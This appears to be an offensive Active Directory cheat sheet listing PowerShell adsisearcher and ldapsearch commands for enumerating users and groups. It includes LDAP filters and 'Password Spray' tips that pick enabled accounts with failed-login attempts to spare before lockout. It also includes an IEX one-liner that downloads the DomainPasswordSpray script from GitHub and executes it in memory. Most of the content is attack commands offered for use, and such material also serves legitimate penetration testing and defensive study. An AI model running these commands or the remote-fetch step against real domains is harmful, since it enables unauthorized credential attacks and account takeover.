Enumerate Users & Groups

adsisearcher

Perform all kind of standard LDAP query to the Active Directory database from a domain-joined computer.

([adsisearcher]"(&(objectCategory=person)(objectClass=user)(samaccountname=*))").FindAll().Properties.samaccountname

Combine this base query with other useful LDAP filters to fine-tune your search:

Filter Description
userAccountControl:1.2.840.113556.1.4.803:=2 Disabled account
!(userAccountControl:1.2.840.113556.1.4.803:=2) Enabled account
userAccountControl:1.2.840.113556.1.4.803:=65536 Password never expire
badpwdcount<=[LOCKOUT TRESHOLD - 2] At least 1 failed attempt left (get lockout threshold)
admincount=1 Objects protected by AdminSDHolder (kesako?)
memberof=CN=Domain Admins,CN=Users,DC=domain,DC=example,DC=org Member of Domain Admins

Tip

Password Spray: ([adsisearcher]"(&(objectCategory=person)(objectClass=user)(samaccountname=*)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(badpwdcount<=1)(userAccountControl:1.2.840.113556.1.4.803:=65536)))").FindAll().Properties.samaccountname

Note

Enumerate Groups: ([adsisearcher]"(&(objectClass=group)(samaccountname=*))").FindAll().Properties | % { Write-Host $_.samaccountname : $_.description }

Reference: social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx

DomainPasswordSpray.ps1

Generate a list of all users in the domain ready for a password spray attack by automatically removing disabled accounts and those that are about to be locked out.

Get-DomainUserList -RemoveDisabled -RemovePotentialLockouts

Tip

IEX (New-Object System.Net.WebClient).DownloadString('https://github.com/dafthack/DomainPasswordSpray/raw/master/DomainPasswordSpray.ps1')

Source: github.com/dafthack/DomainPasswordSpray

ldapsearch

Perform all kind of standard LDAP query to the Active Directory database from outside the domain using valid credentials.

SASL authentication:

ldapsearch -H ldap[s]://<IP>:[PORT] -U <USERNAME> -LL -E pr=1000/noprompt -b 'dc=<EXAMPLE>,dc=<ORG>' -s sub '(&(objectCategory=person)(objectClass=user)(sAMAccountName=*))' [OUTPUT ATTRIBUTE]

Simple authentication (password in cleartext over the wire):

ldapsearch -x -W -H ldap[s]://<IP>:[PORT] -D <USERNAME> -LL -E pr=1000/noprompt -b 'dc=<EXAMPLE>,dc=<ORG>' -s sub '(&(objectCategory=person)(objectClass=user)(sAMAccountName=*))' [OUTPUT ATTRIBUTE]

Combine this base query with the other useful LDAP filters from the adsisearcher section to fine-tune your search.

Tip

Password Spray: ldapsearch -H ldap[s]://<IP>:[PORT] -U <USERNAME> -LL -E pr=1000/noprompt -b 'dc=<EXAMPLE>,dc=<ORG>' -s sub '(&(objectCategory=person)(objectClass=user)(samaccountname=*)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(badpwdcount<=1)(userAccountControl:1.2.840.113556.1.4.803:=65536)))' sAMAccountName | grep sAMAccountName | cut -d' ' -f2

ADExplorer

Perform recon from a computer outside the domain using credentials of a standard user. See the SysInternals page for details.